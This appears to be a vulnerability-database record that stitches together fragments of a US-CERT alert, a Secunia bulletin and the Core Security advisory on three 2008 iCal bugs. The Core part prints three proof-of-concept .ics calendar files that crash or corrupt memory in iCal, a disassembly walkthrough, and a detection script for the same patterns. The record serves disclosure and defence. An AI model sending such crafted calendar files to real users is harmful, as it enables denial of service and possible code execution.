var-200805-0584
Vulnerability from variot
Use-after-free vulnerability in Apple iCal 3.0.1 on Mac OS X allows remote CalDAV servers, and user-assisted remote attackers, to trigger memory corruption or possibly execute arbitrary code via an "ATTACH;VALUE=URI:S=osumi" line in a .ics file, which triggers a "resource liberation" bug. NOTE: CVE-2008-2007 was originally used for this issue, but this is the appropriate identifier. The security update addresses a total of 19 new vulnerabilities that affect the AFP Server, AppKit, Apple Pixlet Video, ATS, CFNetwork, CoreFoundation, CoreGraphics, CoreTypes, CUPS, Help Viewer, iCal, International Components for Unicode, Image Capture, ImageIO, Kernel, Mail, Single Sign-On, and Wiki Server components of Mac OS X. Attackers can leverage this issue to execute arbitrary code with the privileges of the affected application. Successful exploits will compromise the application and possibly the underlying computer. Failed attacks will likely cause denial-of-service conditions. NOTE: This issue was previously covered in BID 29412 (Apple Mac OS X 2008-003 Multiple Security Vulnerabilities) but has been given its own record to better document the vulnerability.
I. Further details are available in the US-CERT Vulnerability Notes Database.
IV. Please send email to cert@cert.org with "TA08-150A Feedback VU#566875" in the subject.
Produced 2008 by US-CERT, a government organization.
1) An error in AFP server allows connected users or guests to access files and directories that are not within a shared directory.
2) Some vulnerabilities in Apache can be exploited by malicious people to conduct cross-site scripting attacks or to cause a DoS (Denial of Service).
3) An unspecified error in AppKit can potentially be exploited to execute arbitrary code when a user opens a specially crafted document file with an editor that uses AppKit (e.g. TextEdit).
4) Multiple unspecified errors exist in the processing of Pixlet video files.
5) An unspecified error exists in Apple Type Services when processing embedded fonts in PDF files. This can be exploited to cause a memory corruption when a PDF file containing a specially crafted embedded font is printed.
Successful exploitation may allow execution of arbitrary code.
6) An error in Safari's SSL client certificate handling can lead to an information disclosure of the first client certificate found in the keychain when a web server issues a client certificate request.
7) An integer overflow exists in CoreFoundation when handling CFData objects. This can be exploited to cause a heap-based buffer overflow if an application calls "CFDataReplaceBytes" with an invalid "length" argument.
8) An error due to an uninitialised variable in CoreGraphics can potentially be exploited to execute arbitrary code when a specially crafted PDF is opened.
9) A weakness is caused due to users not being warned before opening certain potentially unsafe content types.
10) An error when printing to password-protected printers with debug logging enabled may lead to the disclosure of sensitive information.
11) Some vulnerabilities in Adobe Flash Player can be exploited by malicious people to bypass certain security restrictions, conduct cross-site scripting attacks, or to potentially compromise a user's system.
For more information: SA28083
12) An integer underflow error in Help Viewer when handling help:topic URLs can be exploited to cause a buffer overflow when a specially crafted help:topic URL is accessed.
Successful exploitation may allow execution of arbitrary code.
13) A conversion error exists in ICU when handling certain character encodings. This can potentially be exploited to bypass content filters and may lead to cross-site scripting and disclosure of sensitive information.
14) Input passed to unspecified parameters in Image Capture's embedded web server is not properly sanitised before being used. This can be exploited to disclose the content of local files via directory traversal attacks.
15) An error in the handling of temporary files in Image Capture can be exploited by malicious, local users to manipulate files with the privilege of a user running Image Capture.
16) A boundary error in the BMP and GIF image decoding engine in ImageIO can be exploited to disclose content in memory.
17) Some vulnerabilities in ImageIO can be exploited by malicious people to cause a DoS (Denial of Service).
The vulnerabilities are caused due to the use of vulnerable libpng code.
For more information: SA27093 SA27130
18) An integer overflow error in ImageIO within the processing of JPEG2000 images can be exploited to cause a heap-based buffer overflow when a specially crafted JPEG2000 image is viewed.
Successful exploitation of this vulnerability may allow execution of arbitrary code.
19) An error in Mail is caused due to an uninitialised variable and can lead to disclosure of sensitive information and potentially execution of arbitrary code when mail is sent through an SMTP server over IPv6.
20) A vulnerability in Mongrel can be exploited by malicious people to disclose sensitive information.
For more information: SA28323
21) The sso_util command-line tool requires that passwords be passed to it in its arguments, which can be exploited by malicious, local users to disclose the passwords.
22) An error in Wiki Server can be exploited to determine valid local user names when nonexistent blogs are accessed.
ORIGINAL ADVISORY: http://support.apple.com/kb/HT1897
OTHER REFERENCES: SA18008: http://secunia.com/advisories/18008/
SA18307: http://secunia.com/advisories/18307/
SA26273: http://secunia.com/advisories/26273/
SA26636: http://secunia.com/advisories/26636/
SA27093: http://secunia.com/advisories/27093/
SA27130: http://secunia.com/advisories/27130/
SA28081: http://secunia.com/advisories/28081/
SA28083: http://secunia.com/advisories/28083/
SA28323: http://secunia.com/advisories/28323/
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
Multiple vulnerabilities in iCal
Advisory Information
Title: Multiple vulnerabilities in iCal
Advisory ID: CORE-2008-0126
Advisory URL: http://www.coresecurity.com/?action=item&id=2219
Date published: 2008-05-21
Date of last update: 2008-05-21
Vendors contacted: Apple Inc.
Release mode: Coordinated release
Vulnerability Information
Class: Input Validation
Remotely Exploitable: Yes (client-side)
Locally Exploitable: No
Bugtraq ID: 28629 28632 28633
CVE Name: CVE-2008-1035 CVE-2008-2006 CVE-2008-2007
Vulnerability Description
iCal is a personal calendar application from Apple Inc. The calendar application can be used as a stand-alone application or as a client-side component to a calendar server that lets users create and share multiple calendars and subscribe to other users' calendars. Apple's iCal uses the iCalendar standard for its calendar file format (which uses the '.ics' filename extension) [1] and the CalDAV protocol for calendar sharing [2]. There is a growing number of web sites providing calendar files and open subscription to calendar updates [3][4][5].
The other two vulnerabilities lead to abnormal termination (crash) of the iCal application due to null-pointer dereference bugs triggered while parsing malformed '.ics' files.
Exploitation of these vulnerabilities in a client-side attack scenario is possible with user assistance, by opening or clicking on a specially crafted '.ics' file sent over email or hosted on a malicious web server; or without direct user assistance, if a would-be attacker has the ability to legitimately add or modify calendar files on a CalDAV server.
Vulnerable Packages
. iCal version 3.0.1 on MacOS X 10.5.1 (Leopard).
Non-vulnerable Packages
. Available through Apple security updates (see vendor information below).
Vendor Information, Solutions and Workarounds
The following information was provided by the vendor:
Availability
Apple security updates are available via the Software Update mechanism: http://support.apple.com/kb/HT1338
Apple security updates are also available for manual download via: http://www.apple.com/support/downloads/
Cross-References
If you provide cross-referencing information in your advisory please link to the following URL: http://support.apple.com/kb/HT1222
Credits
These vulnerabilities were discovered and researched by Rodrigo Carvalho, from the Core Security Consulting Services (SCS) team of Core Security Technologies during Bugweek 2007. Additional research was done by Ricardo Narvaja from the CORE IMPACT Exploit Writers Team (EWT).
A client-side attack directed at the end users of the iCal application can be executed by sending an email with a malicious .ics file attachment, by hosting a malicious .ics file on a web site and directing users to open it, or by injecting a malicious .ics file on a CalDAV-enabled server to which potential victims are subscribed to update their calendars automatically. In the three reported cases the vulnerabilities arise from improper validation of input while or after parsing the calendar file format.
1) Null pointer de-reference #1 (Bugtraq ID 28629, CVE-2008-2006)
Improper sanitization of integer input may lead to null pointer dereference and possibly to an application that loses control of its execution, resulting in a denial of service.
A vulnerable .ics file will contain the following line:
/-----------
RRULE:FREQ=DAILY;INTERVAL=1;COUNT=2147483646
-----------/
The 'COUNT' value causes an integer overflow, which leads to a null pointer dereference when iCal tries to use it after the .ics file is imported.
The following Proof of Concept (PoC) file is provided to demonstrate its feasibility. To trigger the bug, import a .ics file with the following content and then select one of the created events.
/-----------
BEGIN:VCALENDAR
X-WR-TIMEZONE:America/Buenos_Aires
PRODID:-//Apple Inc.//iCal 3.0//EN
CALSCALE:GREGORIAN
X-WR-CALNAME: Vulnerable
VERSION:2.0
X-WR-RELCALID:10DE4203-4FA5-4E23-AE4D-9DAE3157C9E5
METHOD:PUBLISH
BEGIN:VTIMEZONE
TZID:America/Buenos_Aires
BEGIN:DAYLIGHT
TZOFFSETFROM:-0300
TZOFFSETTO:-0300
DTSTART:19991003T000000
RDATE:19991003T000000
TZNAME:ARST
END:DAYLIGHT
BEGIN:STANDARD
TZOFFSETFROM:-0300
TZOFFSETTO:-0300
DTSTART:20000303T000000
RDATE:20000303T000000
RDATE:20001231T210000
TZNAME:ART
END:STANDARD
END:VTIMEZONE
BEGIN:VEVENT
SEQUENCE:4
DTSTART;TZID=America/Buenos_Aires:20071225T110000
DURATION:PT1H
UID:48878014-5F03-43E5-8639-61E708714F9A
DTSTAMP:20071213T130632Z
SUMMARY:Vuln
CREATED:20071213T130611Z
RRULE:FREQ=DAILY;INTERVAL=1;COUNT=2147483646
END:VEVENT
END:VCALENDAR
-----------/
Analysis of the vulnerability
The above proof-of-concept file creates new events in the iCal application. When a user double-clicks on one of these events, the program crashes while writing to the memory pointed to by 'EDI=0'. Only the value of 'EAX' is under control; it must be less than '0x7fffffff' and is extracted from the following line of the PoC '.ics' file.
/-----------
RRULE:FREQ=DAILY;INTERVAL=1;COUNT=2147483646 (0x7FFFFFFE)
-----------/
/-----------
__text:0013C178 push ebp
__text:0013C179 mov ebp, esp
__text:0013C17B sub esp, 38h
__text:0013C17E mov eax, ds:off_1F435C
__text:0013C183 mov [ebp+var_4], edi
__text:0013C186 mov edi, [ebp+arg_C]
__text:0013C189 mov [ebp+var_8], esi
__text:0013C18C mov esi, [ebp+arg_8]
__text:0013C18F mov [ebp+var_C], ebx
__text:0013C192 mov [esp+38h+var_34], eax
__text:0013C196 mov eax, [ebp+arg_0]
__text:0013C199 mov [esp+38h+var_28], 0
__text:0013C1A1 mov [esp+38h+var_2C], 0
-----------/
Here the code writes to '[ebp + var28]' and '[ebp + var2C]', and because 'EBP' is 'ESP' minus '0x38', this is similar to
/-----------
[ebp + var28] = [esp+0x38+var_28]
[ebp + var2C] = [esp+0x38+var_2C]
-----------/
This is where the null pointers are located on the stack.
/-----------
BFFFEF7C var_2C dd 0
BFFFEF80 var_28 dd 0
-----------/
Upon reaching the function where the crash occurs:
/-----------
__text:0014ADC3 push ebp
__text:0014ADC4 mov ebp, esp
__text:0014ADC6 sub esp, 48h
__text:0014ADC9 mov eax, ds:stru_1FA2A0.superclass
-----------/
Logically, the zeros are still present, because those values are not touched until we enter.
/-----------
BFFFEF7C arg_C dd 0
BFFFEF80 arg_10 dd 0
-----------/
We see that the function argument 'arg_C' is loaded and moved to 'EDI'.
/-----------
0014ADE0 mov edi, [ebp+arg_C]
-----------/
This is the location that is written to at the moment of the crash further ahead, meaning that it is a zero that can't be changed.
/-----------
0014AE2F mov dword ptr [edi], 0
-----------/
Getting closer to the point of the crash: because we control 'EAX', we can trigger a jump after the comparisons with '[ebx+0Ch]' and '[ebx+08h]'.
/-----------
0014AE20 cmp eax, [ebx+0Ch] (if it is lower than 1)
0014AE23 jl short loc_14AE2F
0014AE25 cmp eax, [ebx+8] (if it is lower than 0x270F)
0014AE2D jle short loc_14AE37
169280B8 dd 270Fh (ebx+08)
169280BC dd 1 (ebx+0C)
-----------/
The first comparison for 'JL' doesn't avoid the crash zone, but anyway negative numbers can't be inserted by default, and a zero value does not crash the program or even get it near the critical zone. Any other value crashes the application when writing to the null location.
In the other case a comparison is made such that if 'EAX' is less than '0x270f' the crash zone is avoided and the program continues to work without problem. Negative values are not read, and if a value is greater than '0x7fffffff' the maximum value is used instead.
2) Null pointer dereference #2 (Bugtraq ID 28632, CVE-2008-2006)
A vulnerable .ics file will contain the following line:
/-----------
TRIGGER:-PT65535H
-----------/
The 'TRIGGER' value causes a null pointer dereference when iCal tries to use it after the .ics file is imported.
The corresponding PoC follows. To trigger the bug, import a .ics file with the following content, then click on the 65535 in edit mode and accept it without changes.
/-----------
BEGIN:VCALENDAR
X-WR-CALNAME:Fake event
PRODID:-//Apple Inc.//iCal 3.0//EN
CALSCALE:GREGORIAN
VERSION:2.0
METHOD:PUBLISH
BEGIN:VTIMEZONE
TZID:America/Buenos_Aires
BEGIN:DAYLIGHT
TZOFFSETFROM:-0300
TZOFFSETTO:-0300
DTSTART:19991003T000000
RDATE:19991003T000000
TZNAME:ARST
END:DAYLIGHT
BEGIN:STANDARD
TZOFFSETFROM:-0300
TZOFFSETTO:-0300
DTSTART:20000303T000000
RDATE:20000303T000000
RDATE:20001231T210000
TZNAME:ART
END:STANDARD
END:VTIMEZONE
BEGIN:VEVENT
SEQUENCE:10
DTSTART;TZID=America/Buenos_Aires:20071225T000000
DTSTAMP:20071213T124414Z
SUMMARY:Fake Event
DTEND;TZID=America/Buenos_Aires:20071225T010000
RRULE:FREQ=YEARLY;INTERVAL=1;COUNT=1
UID:651D31BE-455E-45ED-99C6-55B9F03A3FA9
TRANSP:OPAQUE
CREATED:20071213T124215Z
BEGIN:VALARM
X-WR-ALARMUID:958B6A5B-91E6-4F80-829F-89AD5B17AF49
ACTION:DISPLAY
DESCRIPTION:Event reminder
TRIGGER:-PT65535H
END:VALARM
END:VEVENT
END:VCALENDAR
-----------/
3) Improper resource liberation (Bugtraq ID 28633, CVE-2008-2007)
This is another case of bad validation of a file with the iCalendar format that results in a more serious bug.
A vulnerable .ics file will contain the following line:
/-----------
ATTACH;VALUE=URI:S=osumi
-----------/
The corresponding PoC follows. Double-click on the .ics file with the following content; an event will be created. To crash iCal, click on the newly created event and then on the alarm sound list.
/-----------
BEGIN:VCALENDAR
X-WR-TIMEZONE:America/Buenos_Aires
PRODID:-//Apple Inc.//iCal 3.0//EN
CALSCALE:GREGORIAN
X-WR-CALNAME:evento falso
VERSION:2.0
X-WR-RELCALID:71CE8EAD-380B-4EA3-A123-60F9B2A03990
METHOD:PUBLISH
BEGIN:VTIMEZONE
TZID:America/Buenos_Aires
BEGIN:DAYLIGHT
TZOFFSETFROM:-0300
TZOFFSETTO:-0300
DTSTART:19991003T000000
RDATE:19991003T000000
TZNAME:ARST
END:DAYLIGHT
BEGIN:STANDARD
TZOFFSETFROM:-0300
TZOFFSETTO:-0300
DTSTART:20000303T000000
RDATE:20000303T000000
RDATE:20001231T210000
TZNAME:ART
END:STANDARD
END:VTIMEZONE
BEGIN:VEVENT
SEQUENCE:11
DTSTART;TZID=America/Buenos_Aires:20071225T000000
DTSTAMP:20071213T143420Z
SUMMARY:evento falso
DTEND;TZID=America/Buenos_Aires:20071225T010000
LOCATION:donde se hace
RRULE:FREQ=YEARLY;INTERVAL=1;COUNT=1
TRANSP:OPAQUE
UID:651D31BE-455E-45ED-99C6-55B9F03A3FA9
URL;VALUE=URI:http://pepe.com:443/pepe
ATTACH;FMTTYPE=text/php;X-APPLE-CACHED=1:ical://attachments/4E3646DE-ED2
 0-449C-88E7-744E62BC8C12/651D31BE-455E-45ED-99C6-55B9F03A3FA9/popote.php
CREATED:20071213T142720Z
CREATED:20071213T124215Z
BEGIN:VALARM
X-WR-ALARMUID:958B6A5B-91E6-4F80-829F-89AD5B17AF49
ACTION:DISPLAY
DESCRIPTION:Event reminder
TRIGGER:-PT15H
END:VALARM
BEGIN:VALARM
X-WR-ALARMUID:F54A0E05-57B8-4562-8E77-056B19305CD0
ACTION:AUDIO
TRIGGER:-PT15M
ATTACH;VALUE=URI:S=osumi
END:VALARM
END:VEVENT
END:VCALENDAR
-----------/
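A mail gateway or CalDAV server can screen calendars for the three property patterns described above before a client imports them. The following Python scanner is an added example, not code from the Core advisory or from Apple's fix; the limits, the function names, the sample calendar, and the acceptance of a bare sound name in an audio alarm's ATTACH value are assumptions made for illustration.

```python
import re

# Policy limits are assumptions of this example, not values from Apple's fix.
MAX_RRULE_COUNT = 0x270F           # upper bound compared at [ebx+8] in the disassembly
MAX_TRIGGER_SECONDS = 366 * 86400  # flag alarms more than a year away from the event

N = r"(\d{1,9})"                   # bounded digit run, so int() never sees huge input
DURATION_RE = re.compile(
    r"^([+-])?P(?:" + N + r"W|(?:" + N + r"D)?(?:T(?:" + N + r"H)?(?:" + N
    + r"M)?(?:" + N + r"S)?)?)$", re.ASCII)
URI_SCHEME_RE = re.compile(r"^[A-Za-z][A-Za-z0-9+.-]*:")
# Assumption: an audio alarm may name a sound with a plain token instead of a URI.
BARE_NAME_RE = re.compile(r"^[A-Za-z0-9 _-]+$")


def unfold(text):
    """Undo iCalendar line folding: a break followed by space or tab continues a line."""
    lines = []
    for raw in text.replace("\r\n", "\n").split("\n"):
        if raw[:1] in (" ", "\t") and lines:
            lines[-1] += raw[1:]
        elif raw:
            lines.append(raw)
    return lines


def split_content_line(line):
    """Return (NAME, {PARAM: value}, value); the first ':' outside quotes ends the head."""
    in_quotes = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_quotes = not in_quotes
        elif ch == ":" and not in_quotes:
            name, *params = line[:i].split(";")
            parsed = {k.upper(): v.strip('"')
                      for k, _, v in (p.partition("=") for p in params)}
            return name.upper(), parsed, line[i + 1:]
    return None


def duration_seconds(value):
    """Parse a duration such as -PT15M into signed seconds; None if malformed."""
    value = value.strip()
    m = DURATION_RE.match(value)
    if not m or value.lstrip("+-") in ("P", "PT"):
        return None
    sign, w, d, h, mi, s = m.groups()
    total = (int(w or 0) * 604800 + int(d or 0) * 86400
             + int(h or 0) * 3600 + int(mi or 0) * 60 + int(s or 0))
    return -total if sign == "-" else total


def scan_ics(text):
    """Return (logical_line, component_path, property, reason) per suspicious line."""
    findings, stack = [], []

    def flag(n, name, reason):
        findings.append((n, "/".join(stack), name, reason))

    for n, line in enumerate(unfold(text), 1):
        parsed = split_content_line(line)
        if parsed is None:
            flag(n, "?", "not a NAME:VALUE content line")
            continue
        name, params, value = parsed
        if name == "BEGIN":
            stack.append(value.upper())
        elif name == "END":
            if stack:
                stack.pop()
        elif name == "RRULE":
            parts = {k.upper(): v for k, _, v in
                     (p.partition("=") for p in value.split(";") if p)}
            count = parts.get("COUNT")
            if count is not None and not (
                    re.fullmatch(r"[0-9]{1,9}", count)
                    and 1 <= int(count) <= MAX_RRULE_COUNT):
                flag(n, name, "COUNT outside 1..%d" % MAX_RRULE_COUNT)
        elif name == "TRIGGER" and params.get("VALUE", "DURATION").upper() == "DURATION":
            secs = duration_seconds(value)
            if secs is None or abs(secs) > MAX_TRIGGER_SECONDS:
                flag(n, name, "malformed or oversized alarm offset")
        elif name == "ATTACH" and params.get("VALUE", "URI").upper() == "URI":
            if not (URI_SCHEME_RE.match(value) or BARE_NAME_RE.match(value)):
                flag(n, name, "value is neither a URI nor a plain sound name")
    return findings


# Constructed sample: a minimal calendar carrying the three property lines quoted
# in the advisory, plus one benign folded ATTACH line to exercise unfolding.
SAMPLE = "\r\n".join([
    "BEGIN:VCALENDAR", "VERSION:2.0", "BEGIN:VEVENT",
    "UID:constructed-sample-1", "DTSTART:20071225T110000Z",
    "RRULE:FREQ=DAILY;INTERVAL=1;COUNT=2147483646",
    "ATTACH;FMTTYPE=text/plain:ical://attachments/CONSTRUCTED-ID/not", " es.txt",
    "BEGIN:VALARM", "ACTION:DISPLAY", "TRIGGER:-PT65535H", "END:VALARM",
    "BEGIN:VALARM", "ACTION:AUDIO", "TRIGGER:-PT15M",
    "ATTACH;VALUE=URI:S=osumi", "END:VALARM",
    "END:VEVENT", "END:VCALENDAR", ""])

if __name__ == "__main__":
    for finding in scan_ics(SAMPLE):
        print(finding)
```

Line numbers in the findings refer to logical (unfolded) content lines, so they can differ from the physical line numbers of the file.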
Report Timeline
. 2008-01-30: Core sends an initial notification that vulnerabilities were discovered in the iCal application and iCal server and that an advisory draft is available.
. 2008-01-31: Vendor acknowledges and requests the draft.
. 2008-01-31: Core sends the draft, including proof-of-concept files that trigger the bugs.
. 2008-02-12: Core requests update info on the vulnerabilities and states that it wants to coordinate the date of the disclosure.
. 2008-02-18: Core requests update info on the vulnerabilities.
. 2008-02-18: Vendor replies that the iCal Server (CVE-2008-1000) vulnerability is tracked for a fix in an upcoming update and the vulnerabilities in the iCal client application will be fixed in an update following the early March software update.
. 2008-02-19: Core indicated that it will split the report in two security advisories. CORE-2008-0123 will address the vulnerability in iCal server (CVE-2008-1000) and will be published in coordination with the release of the vendor's March software update. The publication date for the second advisory, dealing with the three vulnerabilities in the iCal client application, will be coordinated for a date after the March update unless there are clear indications of the vulnerability being exploited in the wild, in which case, if Core considers that the information provided in the advisory would help end users to decide how to react, the advisory would be published sooner as a "forced release".
. 2008-03-03: Core requests update info on the vulnerability, a concrete release schedule and text for the advisory section called "Vendor Information, Solutions and Workarounds".
. 2008-03-04: Vendor provides information concerning CVE-2008-1000 and indicates that the bug is in the Wiki server and not the iCal Server.
. 2008-03-13: Core re-schedules the publication to March 24th and requests from the vendor an update on the coordinated date of disclosure.
The remaining three vulnerabilities in the iCal client application will be dealt with by a second security advisory (CORE-2008-0126) to be published after the release of the March software update. Publication of CORE-2008-0126 is initially slated for March 24th 2008 but the final date estimation can be discussed further with the vendor based on its estimated date for fixes.
. 2008-03-18: APPLE-SA-2008-0318 software update released.
. 2008-03-18: CORE-2008-0123 is published.
. 2008-03-18: Vendor informs that it will track the first two issues as crasher-only bugs but still intends to address them. Further details to determine if the null pointer de-reference bugs are exploitable are requested. The vendor will continue to track the third as a security bug and estimates early April for the release of the software update that fixes them. Additional timing information will be provided closer to the estimated date.
. 2008-03-18: Core re-schedules the publication to April 7th and indicates that should any new details about the vulnerabilities become available they will be forwarded to the vendor.
. 2008-04-04: Core requests a more precise date of release of the fixes to coordinate the publication and recommends that the vendor consider the three as security bugs because it couldn't be proved that in this case the integer overflows can't be exploited.
. 2008-04-07: Vendor requests that Core postpone the advisory publication until the fix is available.
. 2008-04-07: Core requests a more precise date of release of the fixes to coordinate the new publication date.
. 2008-04-07: Vendor informs that the estimated date for the update is near the end of April.
. 2008-04-08: Core confirms that coordinating the publication of CORE-2008-0126 for April 28th is acceptable.
. 2008-04-16: Core requests an update on the release date of the fixes.
. 2008-04-17: Vendor states that end of April is still the estimated date and provides more details that explain why the first two bugs are being considered null-pointer dereference bugs only. A value range verification is performed and out-of-range values branch execution flow to instructions that assign NULL to a pointer, which later triggers a null pointer de-reference that causes the application to crash. The root cause of the crash is a NULL pointer de-reference and not an integer overflow.
. 2008-04-17: Core confirms that the two first bugs can be considered crashes due to null-pointer dereference. Upon further research it is confirmed that integer overflows are detected and do not cause the actual crashes.
. 2008-04-17: Vendor asks for confirmation that the first two bugs have no security related consequences.
. 2008-04-17: Core responds that the three bugs still have security related consequences. The first two bugs can be abused to execute denial of service attacks by untrusted and unauthenticated third parties, specifically using a public server as attack vector. Core considers bugs that allow unauthenticated third parties to be security vulnerabilities. Core indicates that exploitation of null pointer de-reference bugs cannot be ruled out generically, a statement which could be derived from Rice's theorem.
. 2008-04-25: Core requests an update on the release date of the fixes and sends detailed information on the analysis of the first bug.
. 2008-04-27: Vendor estimates early May as the date of the software fixes release.
. 2008-05-05: Core informs the vendor that it's re-scheduling the publication to May 12th as a final date unless precise information is given on the release date of the fixes.
. 2008-05-06: Vendor responds specifying that the fixes are being released sometime the following week.
. 2008-05-07: Core states that it is not willing to re-schedule the publication date unless the vendor commits to a concrete date.
. 2008-05-10: Vendor asks Core not to publish the advisory before the Apple security update is available. Vendor indicates that fixes will be released on May 19th, 2008.
. 2008-05-10: Given that the vendor has communicated a concrete date, Core will discuss re-scheduling (for the fifth time) the publication date of the advisory.
. 2008-05-12: Core communicates to the vendor that the publication of the advisory is re-scheduled to May 21st and that this date is final.
. 2008-05-14: Vendor acknowledges reception of the last email and appreciates that Core postponed the advisory publication date.
. 2008-05-20: Core sends the final draft of the advisory to the vendor.
. 2008-05-21: An edited and corrected final version of the advisory is sent to the vendor.
. 2008-05-21: Advisory CORE-2008-0126 is published.
References
[1] RFC 2445: Internet Calendaring and Scheduling Core Object Specification (iCalendar) - http://tools.ietf.org/html/rfc2445
[2] RFC 4791: Calendaring Extensions to WebDAV - http://tools.ietf.org/html/rfc4791
[3] http://www.apple.com/downloads/macosx/calendars/
[4] iCalShare - http://icalshare.com/
[5] iCalWorld - http://www.icalworld.com/
About CoreLabs
CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs/.
About Core Security Technologies
Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com.
Disclaimer
The contents of this advisory are copyright (c) 2008 Core Security Technologies and (c) 2008 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.
GPG/PGP Keys
This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
\n\n10) An error when printing to password-protected printers with debug\nlogging enabled may lead to the disclosure of sensitive information. \n\n11) Some vulnerabilities in Adobe Flash Player can be exploited by\nmalicious people to bypass certain security restrictions, conduct\ncross-site scripting attacks, or to potentially compromise a user\u0027s\nsystem. \n\nFor more information:\nSA28083\n\n12) An integer underflow error in Help Viewer when handling\nhelp:topic URLs can be exploited to cause a buffer overflow when a \nspecially crafted help:topic URL is accessed. \n\nSuccessful exploitation may allow execution of arbitrary code. \n\n13) A conversion error exists in ICU when handling certain character\nencodings. This can potentially be exploited bypass content filters\nand may lead to cross-site scripting and disclosure of sensitive\ninformation. \n\n14) Input passed to unspecified parameters in Image Capture\u0027s\nembedded web server is not properly sanitised before being used. This\ncan be exploited to disclose the content of local files via directory\ntraversal attacks. \n\n15) An error in the handling of temporary files in Image Capture can\nbe exploited by malicious, local users to manipulate files with the\nprivilege of a user running Image Capture. \n\n16) A boundary error in the BMP and GIF image decoding engine in\nImageIO can be exploited to disclose content in memory. \n\n17) Some vulnerabilities in ImageIO can be exploited by malicious\npeople to cause a DoS (Denial of Service). \n\nThe vulnerabilities are caused due to the use of vulnerable libpng\ncode. \n\nFor more information:\nSA27093\nSA27130\n\n18) An integer overflow error in ImageIO within the processing of\nJPEG2000 images can be exploited to cause a heap-based buffer\noverflow when a specially crafted JPEG2000 image is viewed. \n\nSuccessful exploitation of this vulnerability may allow execution of\narbitrary code. 
\n\n19) An error in Mail is caused due to an uninitialised variable and\ncan lead to disclosure of sensitive information and potentially\nexecution of arbitrary code when mail is sent through an SMTP server\nover IPv6. \n\n20) A vulnerability in Mongrel can be exploited by malicious people\nto disclose sensitive information. \n\nFor more information:\nSA28323\n\n21) The sso_util command-line tool requires that passwords be passed\nto it in its arguments, which can be exploited by malicious, local\nusers to disclose the passwords. \n\n22) An error in Wiki Server can be exploited to determine valid local\nuser names when nonexistent blogs are accessed. \n\nORIGINAL ADVISORY:\nhttp://support.apple.com/kb/HT1897\n\nOTHER REFERENCES:\nSA18008:\nhttp://secunia.com/advisories/18008/\n\nSA18307:\nhttp://secunia.com/advisories/18307/\n\nSA26273:\nhttp://secunia.com/advisories/26273/\n\nSA26636:\nhttp://secunia.com/advisories/26636/\n\nSA27093:\nhttp://secunia.com/advisories/27093/\n\nSA27130:\nhttp://secunia.com/advisories/27130/\n\nSA28081:\nhttp://secunia.com/advisories/28081/\n\nSA28083:\nhttp://secunia.com/advisories/28083/\n\nSA28323:\nhttp://secunia.com/advisories/28323/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. 
-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n\n Core Security Technologies - CoreLabs Advisory\n http://www.coresecurity.com/corelabs/\n\nMultiple vulnerabilities in iCal\n\n\n*Advisory Information*\n\nTitle: Multiple vulnerabilities in iCal\nAdvisory ID: CORE-2008-0126\nAdvisory URL: http://www.coresecurity.com/?action=item\u0026id=2219\nDate published: 2008-05-21\nDate of last update: 2008-05-21\nVendors contacted: Apple Inc. \nRelease mode: Coordinated release\n\n\n*Vulnerability Information*\n\nClass: Input Validation\nRemotely Exploitable: Yes (client-side)\nLocally Exploitable: No\nBugtraq ID: 28629 28632 28633\t\nCVE Name: CVE-2008-1035 CVE-2008-2006 CVE-2008-2007\t\n\n\n*Vulnerability Description*\n\niCal is a personal calendar application from Apple Inc. The calendar application can be used as a\nstand-alone application or as a client-side component to calendar server\nthat lets users create and share multiple calendars and subscribe to\nother user\u0027s calendars. Apple\u0027s iCal uses the iCalendar standard for its\ncalendar file format (which uses the \u0027.ics\u0027 filename extension) [1] and\nthe CalDAV protocol for calendar sharing [2]. There is a growing number\nof web sites providing calendars files and open subscription to calendar\nupdates [3][4][5]. \n\n The other two vulnerabilities lead to abnormal termination (crash) of\nthe iCal application due to null-pointer dereference bugs triggered\nwhile parsing a malformed \u0027.ics\u0027 files. \n\n Exploitation of these vulnerabilities in a client-side attack scenario\nis possible with user assistance by opening or clicking on specially\ncrafted \u0027.ics\u0027 file send over email or hosted on a malicious web server;\nor without direct user assistance if a would-be attacker has the ability\nto legitimately add or modify calendar files on a CalDAV server. \n\n\n*Vulnerable Packages*\n\n. iCal version 3.0.1 on MacOS X 10.5.1 (Leopard). \n\n\n*Non-vulnerable Packages*\n\n. 
